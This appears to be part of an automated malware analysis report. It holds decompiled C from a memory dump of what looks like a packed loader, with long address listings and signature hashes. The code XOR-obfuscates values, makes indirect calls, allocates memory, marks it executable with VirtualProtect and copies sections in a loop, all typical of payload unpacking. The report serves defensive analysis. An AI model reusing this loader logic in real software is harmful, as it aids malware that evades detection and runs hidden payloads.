                  					 *_t1132 = _t449;
                  					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
                  					_v16 = _t987;
                  					 *(_t824 + 0x41c405) = 0 ^ _t781;
                  					_t947 = _v16;
                  					VirtualProtect(_t1097, _v12, _v16, ??);
                  					_t455 = _t824 + 0x41c772; // 0x41c772
                  					_v20 = 0;
                  					 *_t1132 =  *_t1132 ^ _t455;
                  					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
                  					 *_t1132 =  *_t1132 ^ _t824;
                  					 *_t1132 =  *_t1132 | _t458;
                  					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
                  					_v12 = _t1060;
                  					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
                  					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
                  					_t1023 = _v12;
                  				}
                  				_pop( *_t467);
                  				_v16 = 0;
                  				 *_t1132 =  *_t1132 + _t824 + 0x41d305;
                  				 *_t1132 =  *_t1132 ^ _t879;
                  				 *_t1132 =  *_t1132 | _t824 + 0x0041cf53;
                  				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
                  				_v16 = _t947;
                  				 *(_t824 + 0x41c775) = 0 ^ _t701;
                  				_t950 = _v16;
                  				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
                  				_t827 = _t824;
                  				_v20 = 0;
                  				 *_t1132 =  *_t1132 ^ _t827 + 0x0041d2fb;
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1132 =  *_t1132 + _t827 + 0x41c2ea;
                  				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
                  				_pop( *_t485);
                  				_push(_v12);
                  				_pop( *_t487);
                  				do {
                  					 *_t1132 = _t1026;
                  					 *_t1132 =  *_t1132 ^ _t879;
                  					 *_t1132 =  *_t1132 ^ _t827 + 0x0041c966;
                  					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1132 =  *_t1132 | _t706;
                  					 *_t1132 = _t827 + 0x41ca40;
                  					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
                  					_t1133 = _t1132 - 0xfffffffc;
                  					 *_t497 = _t708;
                  					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
                  					_push(_v12);
                  					_pop(_t709);
                  					_t1028 = _t1026;
                  					_v16 = _t950;
                  					_t882 = 0 ^  *(_t827 + 0x41d332);
                  					_t953 = _v16;
                  					if(_t882 > _t709) {
                  						 *_t1133 =  *_t1133 ^ _t1112;
                  						 *_t1133 = _t827 + 0x41c966;
                  						 *_t1133 =  *_t1133 & 0x00000000;
                  						 *_t1133 =  *_t1133 | _t827 + 0x0041ca40;
                  						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
                  					}
                  					 *_t1133 = _t882;
                  					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
                  					_v20 = _t1028;
                  					_t1031 = _v20;
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
                  					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
                  					 *_t1133 = _t711;
                  					_v16 = _v16 & 0x00000000;
                  					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
                  					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
                  					_t1134 =  &(_t1133[1]);
                  					_v20 = _a4;
                  					_push( *_t1133 + _t713);
                  					_t1085 = _v20;
                  					_pop(_t714);
                  					_push( *((intOrPtr*)(_t827 + 0x41cece)));
                  					_pop( *_t525);
                  					_push(_v20);
                  					_pop(_t888);
                  					if(_t888 > _t714) {
                  						 *_t1134 =  *_t1134 - _t888;
                  						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
                  						_v20 = _v20 & 0x00000000;
                  						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
                  						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
                  					}
                  					_v12 = _t1085;
                  					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
                  					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
                  					 *_t1134 = _t1112;
                  					_t889 = 0 ^  *(_t1031 + 0x10);
                  					_t1112 = 0;
                  					 *_t1134 =  *_t1134 & 0x00000000;
                  					 *_t1134 =  *_t1134 ^ _t889;
                  					_v20 = 0;
                  					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
                  					 *_t1134 =  *_t1134 ^ _t1112;
                  					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
                  					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
                  					_v20 = _t1031;
                  					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
                  					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
                  					_t1034 = _v20;
                  					 *_t552 = _t1112;
                  					_push(_v12);
                  					_pop( *_t555);
                  					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
                  					_push(_v16);
                  					_pop(_t1089);
                  					_t955 = _t953;
                  					_v16 = 0;
                  					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
                  					 *_t1134 =  *_t1134 & 0x00000000;
                  					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
                  					_v12 = 0;
                  					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
                  					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
                  					 *_t1134 = _t955;
                  					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
                  					_t958 = 0;
                  					_pop( *_t567);
                  					_t893 = _v16;
                  					_t1035 =  *(_t1034 + 0xc);
                  					 *_t1134 =  *_t1134 & 0x00000000;
                  					 *_t1134 =  *_t1134 + _t893;
                  					 *_t1134 =  *_t1134 - _t1112;
                  					 *_t1134 = _t827 + 0x41c5a4;
                  					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
                  					 *_t1134 =  *_t1134 - _t1112;
                  					 *_t1134 =  *_t1134 ^ _t722;
                  					 *_t1134 =  *_t1134 ^ _t1035;
                  					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
                  					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
                  					 *_t574 = _t1035;
                  					 *_t1134 =  *_t1134 + _t827;
                  					_t828 = _t724;
                  					_t827 = 0;
                  					_push( *((intOrPtr*)(_t827 + 0x41d348)));
                  					_pop( *_t577);
                  					_push(_v12);
                  					_pop(_t896);
                  					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
                  						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
                  						 *_t1134 =  *_t1134 ^ _t958;
                  						 *_t1134 =  *_t1134 | _t579;
                  						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
                  						 *_t1134 =  *_t1134 - _t896;
                  						 *_t1134 =  *_t1134 | _t580;
                  						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
                  						_v20 = _t1089;
                  						 *(_t827 + 0x41c50f) = 0 ^ _t733;
                  						_t1089 = _v20;
                  					}
                  					_v12 = _t958;
                  					_t1036 =  *(_t827 + 0x41c166) + _t1035;
                  					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
                  					_t1136 =  &(_t1134[4]);
                  					_t879 = 0;
                  					_t1132 = _t1136 - 0xfffffffc;
                  					_push(_v12);
                  					_t1026 =  *_t1136 + 0x28;
                  					_pop(_t950);
                  					_t588 =  &_v8;
                  					 *_t588 = _v8 - 1;
                  				} while ( *_t588 != 0);
                  				_pop( *_t590);
                  				_t1041 = _v16;
                  				_push(_t1112);
                  				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
                  				_v20 = _v20 +  *(_t827 + 0x41c166);
                  				_push(_v20);
                  				_pop(_t729);
                  				_t1043 = _t1041;
                  				 *_t1132 = _t950;
                  				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
                  				_t966 = 0;
                  				_v12 = 0;
                  				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
                  				_t901 = _v12;
                  				if(_t1091 > 0) {
                  					 *_t1132 =  *_t1132 & 0x00000000;
                  					 *_t1132 =  *_t1132 + _t1091;
                  					_t730 = E032A4E1A(_t827, _t901, _t966, _t1043, _t1091, _t827);
                  					 *_t1132 = _t1091;
                  					_t729 = E032A2FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
                  				}
                  				_pop( *_t603);
                  				return _t729;
                  			}


































































































































































































                  0x032a5f16
                  0x032a5f16
                  0x032a5f16
                  0x032a5f17
                  0x032a5f1b
                  0x032a5f1e
                  0x032a5f20
                  0x032a5f23
                  0x032a5f24
                  0x032a5f28
                  0x032a5f2b
                  0x032a5f2c
                  0x032a5f30
                  0x032a5f39
                  0x032a5f3a
                  0x032a5f3d
                  0x032a5f46
                  0x032a5f4a
                  0x032a5f4d
                  0x032a5f56
                  0x032a5f57
                  0x032a5f5a
                  0x032a5f5d
                  0x032a5f63
                  0x032a5f66
                  0x032a5f6e
                  0x032a5f71
                  0x032a5f72
                  0x032a5f75
                  0x032a5f78
                  0x032a5f7b
                  0x032a5f84
                  0x032a5f85
                  0x032a5f88
                  0x032a5f8b
                  0x032a5f91
                  0x032a5f94
                  0x032a5f9d
                  0x032a5f9e
                  0x032a5fa2
                  0x032a5fa5
                  0x032a5fab
                  0x032a5fb1
                  0x032a5fb5
                  0x032a5fb8
                  0x032a5fbb
                  0x032a5fbe
                  0x032a5fc0
                  0x032a5fcb
                  0x032a5fd2
                  0x032a5fda
                  0x032a5fdd
                  0x032a5fe6
                  0x032a5fe7
                  0x032a5fea
                  0x032a5ff3
                  0x032a5ff4
                  0x032a5ff7
                  0x032a5ffa
                  0x032a5ffa
                  0x032a6002
                  0x032a6005
                  0x032a6009
                  0x032a600d
                  0x032a6017
                  0x032a601b
                  0x032a6025
                  0x032a6029
                  0x032a602c
                  0x032a6032
                  0x032a6039
                  0x032a604b
                  0x032a6054
                  0x032a605e
                  0x032a6067
                  0x032a6068
                  0x032a606b
                  0x032a606e
                  0x032a6074
                  0x032a607b
                  0x032a607e
                  0x032a6088
                  0x032a608b
                  0x032a6094
                  0x032a6095
                  0x032a6098
                  0x032a609b
                  0x032a60a1
                  0x032a60a7
                  0x032a60ae
                  0x032a60b7
                  0x032a60be
                  0x032a60c1
                  0x032a60c8
                  0x032a60cb
                  0x032a60d4
                  0x032a60db
                  0x032a60de
                  0x032a60e4
                  0x032a60e7
                  0x032a60ee
                  0x032a60f1
                  0x032a60f4
                  0x032a60f7
                  0x032a60f8
                  0x032a6106
                  0x032a6108
                  0x032a610b
                  0x032a6114
                  0x032a6118
                  0x032a6124
                  0x032a6127
                  0x032a612d
                  0x032a6133
                  0x032a613a
                  0x032a6140
                  0x032a6147
                  0x032a614a
                  0x032a614f
                  0x032a6156
                  0x032a615c
                  0x032a615f
                  0x032a6162
                  0x032a616b
                  0x032a616e
                  0x032a6172
                  0x032a6176
                  0x032a617a
                  0x032a617e
                  0x032a6188
                  0x032a618c
                  0x032a6195
                  0x032a619c
                  0x032a619f
                  0x032a61ab
                  0x032a61b2
                  0x032a61be
                  0x032a61c1
                  0x032a61c8
                  0x032a61d1
                  0x032a61db
                  0x032a61de
                  0x032a61e5
                  0x032a61e8
                  0x032a61f1
                  0x032a61fb
                  0x032a61fe
                  0x032a6206
                  0x032a6209
                  0x032a6210
                  0x032a6213
                  0x032a6216
                  0x032a6219
                  0x032a621a
                  0x032a621b
                  0x032a6231
                  0x032a6239
                  0x032a6240
                  0x032a6249
                  0x032a6253
                  0x032a6256
                  0x032a6256
                  0x032a625e
                  0x032a6265
                  0x032a626b
                  0x032a626c
                  0x032a6276
                  0x032a6279
                  0x032a6283
                  0x032a628c
                  0x032a6296
                  0x032a6299
                  0x032a629f
                  0x032a62a9
                  0x032a62b5
                  0x032a62b8
                  0x032a62c3
                  0x032a62c6
                  0x032a62cd
                  0x032a62ce
                  0x032a62d1
                  0x032a62d2
                  0x032a62dd
                  0x032a62df
                  0x032a62e4
                  0x032a62ec
                  0x032a62f6
                  0x032a6300
                  0x032a6303
                  0x032a6306
                  0x032a630c
                  0x032a6314
                  0x032a631b
                  0x032a6321
                  0x032a6321
                  0x032a632a
                  0x032a632d
                  0x032a6335
                  0x032a6338
                  0x032a633b
                  0x032a633e
                  0x032a633f
                  0x032a6343
                  0x032a634d
                  0x032a6351
                  0x032a635d
                  0x032a6360
                  0x032a6368
                  0x032a636f
                  0x032a6375
                  0x032a637c
                  0x032a637f
                  0x032a6385
                  0x032a6389
                  0x032a638c
                  0x032a6396
                  0x032a6399
                  0x032a63a2
                  0x032a63a9
                  0x032a63ac
                  0x032a63b4
                  0x032a63bb
                  0x032a63c1
                  0x032a63c7
                  0x032a63ca
                  0x032a63d1
                  0x032a63d3
                  0x032a63dc
                  0x032a63e6
                  0x032a63e9
                  0x032a63f0
                  0x032a63f3
                  0x032a63fd
                  0x032a6400
                  0x032a6403
                  0x032a6412
                  0x032a6417
                  0x032a641b
                  0x032a641e
                  0x032a6420
                  0x032a6421
                  0x032a642c
                  0x032a642e
                  0x032a6433
                  0x032a643c
                  0x032a643f
                  0x032a6448
                  0x032a6452
                  0x032a6455
                  0x032a6455
                  0x032a6461
                  0x032a6468
                  0x032a646e
                  0x032a6474
                  0x032a6477
                  0x032a6483
                  0x032a6486
                  0x032a648c
                  0x032a6494
                  0x032a649b
                  0x032a64a1
                  0x032a64a6
                  0x032a64b2
                  0x032a64b6
                  0x032a64b9
                  0x032a64c1
                  0x032a64c5
                  0x032a64c8
                  0x032a64d4
                  0x032a64db
                  0x032a64e1
                  0x032a64e3
                  0x032a64e6
                  0x032a64f2
                  0x032a64f5
                  0x032a64fe
                  0x032a650a
                  0x032a650d
                  0x032a6515
                  0x032a6518
                  0x032a651f
                  0x032a6522
                  0x032a6525
                  0x032a6528
                  0x032a6529
                  0x032a6537
                  0x032a6539
                  0x032a653c
                  0x032a653e
                  0x032a6544
                  0x032a654e
                  0x032a6551
                  0x032a6558
                  0x032a655c
                  0x032a655f
                  0x032a655f
                  0x032a6567
                  0x032a656e
                  0x032a6574
                  0x032a6575
                  0x032a6586
                  0x032a6590
                  0x032a6593
                  0x032a659a
                  0x032a659e
                  0x032a65a1
                  0x032a65a9
                  0x032a65b0
                  0x032a65b6
                  0x032a65b7
                  0x032a65ca
                  0x032a65cc
                  0x032a65ce
                  0x032a65d2
                  0x032a65d5
                  0x032a65db
                  0x032a65e5
                  0x032a65e8
                  0x032a65ee
                  0x032a65f6
                  0x032a65fd
                  0x032a6603
                  0x032a660b
                  0x032a6610
                  0x032a6618
                  0x032a661b
                  0x032a6622
                  0x032a6625
                  0x032a662b
                  0x032a6632
                  0x032a6635
                  0x032a663c
                  0x032a6640
                  0x032a6643
                  0x032a664a
                  0x032a664e
                  0x032a6651
                  0x032a6659
                  0x032a665f
                  0x032a6666
                  0x032a6667
                  0x032a666a
                  0x032a666b
                  0x032a6671
                  0x032a6674
                  0x032a6677
                  0x032a667a
                  0x032a6685
                  0x032a668f
                  0x032a6693
                  0x032a6696
                  0x032a669d
                  0x032a66a0
                  0x032a66a3
                  0x032a66a3
                  0x032a66a9
                  0x032a66ac
                  0x032a66af
                  0x032a66c2
                  0x032a66c6
                  0x032a66c9
                  0x032a66d2
                  0x032a66dc
                  0x032a66e8
                  0x032a66eb
                  0x032a66f1
                  0x032a66f8
                  0x032a66fe
                  0x032a6703
                  0x032a6706
                  0x032a670b
                  0x032a670e
                  0x032a6713
                  0x032a671a
                  0x032a671d
                  0x032a6720
                  0x032a6727
                  0x032a6730
                  0x032a673a
                  0x032a673d
                  0x032a6743
                  0x032a674d
                  0x032a6757
                  0x032a675b
                  0x032a675e
                  0x032a676d
                  0x032a6774
                  0x032a6777
                  0x032a677a
                  0x032a677d
                  0x032a677e
                  0x032a677f
                  0x032a6781
                  0x032a678c
                  0x032a6791
                  0x032a679a
                  0x032a679d
                  0x032a67a7
                  0x032a67ab
                  0x032a67ae
                  0x032a67b4
                  0x032a67b6
                  0x032a67bd
                  0x032a67c3
                  0x032a67c4
                  0x032a67c7
                  0x032a67cc
                  0x032a67cf
                  0x032a67d2
                  0x032a67d2
                  0x032a67d3
                  0x032a67dd
                  0x032a67e0
                  0x032a67e7
                  0x032a67f1
                  0x032a67f4
                  0x032a67f7
                  0x032a67fe
                  0x032a6801
                  0x032a680b
                  0x032a680f
                  0x032a6812
                  0x032a681d
                  0x032a6824
                  0x032a6827
                  0x032a682a
                  0x032a682d
                  0x032a682e
                  0x032a682f
                  0x032a6841
                  0x032a684c
                  0x032a6858
                  0x032a685b
                  0x032a6861
                  0x032a6868
                  0x032a686e
                  0x032a6873
                  0x032a6876
                  0x032a687e
                  0x032a6881
                  0x032a6881
                  0x032a6889
                  0x032a688d
                  0x032a6897
                  0x032a689b
                  0x032a68a4
                  0x032a68ae
                  0x032a68b1
                  0x032a68bd
                  0x032a68c4
                  0x032a68cd
                  0x032a68d0
                  0x032a68d3
                  0x032a68e0
                  0x032a68e4
                  0x032a68e7
                  0x032a68f0
                  0x032a68f7
                  0x032a6900
                  0x032a6901
                  0x032a6904
                  0x032a6907
                  0x032a6913
                  0x032a6916
                  0x032a6919
                  0x032a6926
                  0x032a692f
                  0x032a6939
                  0x032a693c
                  0x032a6945
                  0x032a6951
                  0x032a6954
                  0x032a6960
                  0x032a6968
                  0x032a696c
                  0x032a6971
                  0x032a6972
                  0x032a697d
                  0x032a697f
                  0x032a6984
                  0x032a6986
                  0x032a698d
                  0x032a6990
                  0x032a6993
                  0x032a699a
                  0x032a699d
                  0x032a69a0
                  0x032a69a6
                  0x032a69ae
                  0x032a69b5
                  0x032a69bb
                  0x032a69c0
                  0x032a69c3
                  0x032a69c6
                  0x032a69cd
                  0x032a69d0
                  0x032a69d6
                  0x032a69d9
                  0x032a69e0
                  0x032a69e4
                  0x032a69e7
                  0x032a69f0
                  0x032a69f3
                  0x032a69fb
                  0x032a6a02
                  0x032a6a08
                  0x032a6a0b
                  0x032a6a0e
                  0x032a6a13
                  0x032a6a1a
                  0x032a6a1e
                  0x032a6a24
                  0x032a6a27
                  0x032a6a30
                  0x032a6a33
                  0x032a6a3f
                  0x032a6a46
                  0x032a6a4f
                  0x032a6a52
                  0x032a6a56
                  0x032a6a5d
                  0x032a6a64
                  0x032a6a67
                  0x032a6a6e
                  0x032a6a72
                  0x032a6a75
                  0x032a6a7c
                  0x032a6a80
                  0x032a6a83
                  0x032a6a8a
                  0x032a6a8d
                  0x032a6a90
                  0x032a6a9f
                  0x032a6aa6
                  0x032a6aa9
                  0x032a6aac
                  0x032a6aaf
                  0x032a6ab0
                  0x032a6ab3
                  0x032a6abe
                  0x032a6ac0
                  0x032a6ac3
                  0x032a6ac5
                  0x032a6acc
                  0x032a6acf
                  0x032a6ad2
                  0x032a6ad9
                  0x032a6adc
                  0x032a6adf
                  0x032a6ae5
                  0x032a6aec
                  0x032a6af2
                  0x032a6af2
                  0x032a6af5
                  0x032a6af8
                  0x032a6afc
                  0x032a6aff
                  0x032a6b02
                  0x032a6b09
                  0x032a6b0c
                  0x032a6b0f
                  0x032a6b17
                  0x032a6b1e
                  0x032a6b24
                  0x032a6b25
                  0x032a6b2c
                  0x032a6b2f
                  0x032a6b35
                  0x032a6b3f
                  0x032a6b42
                  0x032a6b49
                  0x032a6b4c
                  0x032a6b4f
                  0x032a6b55
                  0x032a6b5c
                  0x032a6b62
                  0x032a6b65
                  0x032a6b6b
                  0x032a6b71
                  0x032a6b7b
                  0x032a6b7e
                  0x032a6b85
                  0x032a6b88
                  0x032a6b8b
                  0x032a6b91
                  0x032a6b99
                  0x032a6ba0
                  0x032a6ba6
                  0x032a6ba6
                  0x032a6baf
                  0x032a6bbb
                  0x032a6bc5
                  0x032a6bcf
                  0x032a6bd2
                  0x032a6bd5
                  0x032a6bdb
                  0x032a6be2
                  0x032a6be8
                  0x032a6bf4
                  0x032a6bf6
                  0x032a6bfd
                  0x032a6c07
                  0x032a6c10
                  0x032a6c17
                  0x032a6c20
                  0x032a6c21
                  0x032a6c24
                  0x032a6c27
                  0x032a6c2d
                  0x032a6c30
                  0x032a6c3a
                  0x032a6c3d
                  0x032a6c40
                  0x032a6c46
                  0x032a6c4d
                  0x032a6c59
                  0x032a6c5c
                  0x032a6c6b
                  0x032a6c72
                  0x032a6c75
                  0x032a6c78
                  0x032a6c7b
                  0x032a6c7c
                  0x032a6c7d
                  0x032a6c88
                  0x032a6c8a
                  0x032a6c8f
                  0x032a6c98
                  0x032a6c9b
                  0x032a6ca5
                  0x032a6ca9
                  0x032a6cac
                  0x032a6cac
                  0x032a6cb4
                  0x032a6cbb
                  0x032a6cc2
                  0x032a6ccc
                  0x032a6cd5
                  0x032a6cdc
                  0x032a6cdf
                  0x032a6ce8
                  0x032a6cf1
                  0x032a6cf8
                  0x032a6cfb
                  0x032a6d06
                  0x032a6d09
                  0x032a6d10
                  0x032a6d11
                  0x032a6d14
                  0x032a6d15
                  0x032a6d1b
                  0x032a6d1e
                  0x032a6d21
                  0x032a6d24
                  0x032a6d2d
                  0x032a6d30
                  0x032a6d39
                  0x032a6d40
                  0x032a6d43
                  0x032a6d43
                  0x032a6d49
                  0x032a6d51
                  0x032a6d58
                  0x032a6d63
                  0x032a6d6b
                  0x032a6d6d
                  0x032a6d6f
                  0x032a6d73
                  0x032a6d7c
                  0x032a6d86
                  0x032a6d90
                  0x032a6d93
                  0x032a6d96
                  0x032a6d9c
                  0x032a6da4
                  0x032a6dab
                  0x032a6db1
                  0x032a6dba
                  0x032a6dc4
                  0x032a6dc5
                  0x032a6dc8
                  0x032a6dcb
                  0x032a6dce
                  0x032a6dcf
                  0x032a6dd0
                  0x032a6dda
                  0x032a6de4
                  0x032a6de8
                  0x032a6df1
                  0x032a6dfb
                  0x032a6dfe
                  0x032a6e06
                  0x032a6e0d
                  0x032a6e13
                  0x032a6e16
                  0x032a6e19
                  0x032a6e1c
                  0x032a6e20
                  0x032a6e24
                  0x032a6e2e
                  0x032a6e31
                  0x032a6e34
                  0x032a6e3b
                  0x032a6e3e
                  0x032a6e48
                  0x032a6e4b
                  0x032a6e4e
                  0x032a6e5a
                  0x032a6e62
                  0x032a6e66
                  0x032a6e6b
                  0x032a6e6c
                  0x032a6e72
                  0x032a6e75
                  0x032a6e78
                  0x032a6e7b
                  0x032a6e7d
                  0x032a6e84
                  0x032a6e87
                  0x032a6e8a
                  0x032a6e91
                  0x032a6e94
                  0x032a6e97
                  0x032a6e9d
                  0x032a6ea4
                  0x032a6eaa
                  0x032a6eaa
                  0x032a6eb9
                  0x032a6ec8
                  0x032a6ec9
                  0x032a6ec9
                  0x032a6ec9
                  0x032a6ed4
                  0x032a6ed7
                  0x032a6ee0
                  0x032a6ee2
                  0x032a6ee3
                  0x032a6ee3
                  0x032a6ee3
                  0x032a6eec
                  0x032a6eef
                  0x032a6ef2
                  0x032a6f07
                  0x032a6f0a
                  0x032a6f0d
                  0x032a6f10
                  0x032a6f11
                  0x032a6f14
                  0x032a6f1b
                  0x032a6f21
                  0x032a6f22
                  0x032a6f31
                  0x032a6f33
                  0x032a6f39
                  0x032a6f3c
                  0x032a6f40
                  0x032a6f43
                  0x032a6f4b
                  0x032a6f4e
                  0x032a6f4e
                  0x032a6f61
                  0x032a6f68

                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.252004989.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: true
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
                  • Instruction ID: 0c8794c832bbf7213fe9d1032a59e6e34e0fe3a71c69bc23a521c9ea7e24c3a3
                  • Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
                  • Instruction Fuzzy Hash: F6C22472844608EFEB049FA4C8C97EEBBF5FF48320F0988ADD895AA145D7345164CF59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E032A709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
                  				void* _t47;
                  				signed int _t48;
                  				signed int _t49;
                  				void* _t51;
                  				void* _t52;
                  				void* _t54;
                  				void* _t55;
                  				signed int _t59;
                  				long _t60;
                  				void* _t62;
                  				void* _t65;
                  				void* _t67;
                  				signed int _t68;
                  				void* _t72;
                  				signed int _t75;
                  				signed int _t78;
                  				void* _t81;
                  				signed int _t82;
                  				long _t87;
                  				signed int _t89;
                  				long _t94;
                  				void* _t97;
                  				void* _t99;
                  				long _t101;
                  				void* _t102;
                  
                  				_t87 = __esi;
                  				_t79 = __edi;
                  				_t72 = __edx;
                  				_t59 = __ebx;
                  				 *_t101 = 0xffff0000;
                  				_t48 = E032A2D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
                  				 *_t101 =  *_t101 | _t59;
                  				_t60 = _t59;
                  				if( *_t101 != 0) {
                  					 *_t101 =  *_t101 + 4;
                  					 *_t101 =  *_t101 - _t94;
                  					 *_t101 =  *_t101 + 0x1000;
                  					 *_t101 =  *_t101 - _t60;
                  					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
                  					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
                  				}
                  				 *(_t94 - 8) = 0;
                  				_push( *(_t94 - 8));
                  				 *_t101 =  *_t101 ^ _t48;
                  				_pop( *_t6);
                  				 *(_t60 + 0x41c60a) = 2;
                  				 *_t101 = _t94;
                  				 *(_t60 + 0x41d10e) = _t48;
                  				_t97 = 0;
                  				if( *(_t60 + 0x41c166) > 0) {
                  					_t55 = _t60 + 0x41c60a;
                  					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
                  					 *_t101 = _t55 +  *_t101;
                  					 *_t101 = 0x40;
                  					_t87 =  *_t101;
                  					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
                  					 *_t101 =  *(_t60 + 0x41c166);
                  					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
                  				}
                  				_push(_t72);
                  				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
                  				_t89 = _t87;
                  				_push(_t72);
                  				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
                  				_t99 = _t97;
                  				_t49 = E032A746C(_t60, _t72, _t79, _t89);
                  				_push( *((intOrPtr*)(_t60 + 0x41c627)));
                  				_pop( *_t24);
                  				_push( *(_t99 - 8));
                  				_pop(_t62);
                  				 *_t101 = _t62;
                  				_t65 = 0;
                  				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
                  				_t81 = _t67;
                  				_t68 = _t65;
                  				if(_t67 != 0) {
                  					 *(_t99 - 8) = 0;
                  					 *_t101 =  *_t101 ^ _t81;
                  					_t49 = E032A2A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
                  				}
                  				_t75 = _t72;
                  				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
                  				_t102 = _t101 + 0xc;
                  				_t82 = _t81 + _t68;
                  				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
                  					_push(0);
                  					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
                  					_t82 = _t82; // executed
                  					_t52 = E032A5F16(_t51, _t60, 0, _t75, _t89); // executed
                  					_push(_t52);
                  					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
                  					_t54 = _t52;
                  					_t51 = E032A8F3B(_t54, _t60, 0, _t75, _t82, _t89);
                  				}
                  				 *(_t99 - 4) = _t82;
                  				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
                  				 *_t41 =  *(_t60 + 0x41d140);
                  				_t78 =  *(_t99 - 8);
                  				_push(_t89);
                  				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
                  				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
                  				asm("popad");
                  				return _t51;
                  			}




























                  0x032a709d
                  0x032a709d
                  0x032a709d
                  0x032a709d
                  0x032a709e
                  0x032a70a5
                  0x032a70ab
                  0x032a70ae
                  0x032a70af
                  0x032a70b2
                  0x032a70b6
                  0x032a70ba
                  0x032a70c1
                  0x032a70cb
                  0x032a70d0
                  0x032a70d0
                  0x032a70d6
                  0x032a70dd
                  0x032a70e0
                  0x032a70e3
                  0x032a70e9
                  0x032a70f5
                  0x032a70fc
                  0x032a7102
                  0x032a710a
                  0x032a710c
                  0x032a7112
                  0x032a7119
                  0x032a711d
                  0x032a712b
                  0x032a712b
                  0x032a7135
                  0x032a7138
                  0x032a7138
                  0x032a713e
                  0x032a7146
                  0x032a714a
                  0x032a714b
                  0x032a7153
                  0x032a7157
                  0x032a7158
                  0x032a715d
                  0x032a7163
                  0x032a7166
                  0x032a7169
                  0x032a716c
                  0x032a7179
                  0x032a717d
                  0x032a717f
                  0x032a7181
                  0x032a7182
                  0x032a7184
                  0x032a718e
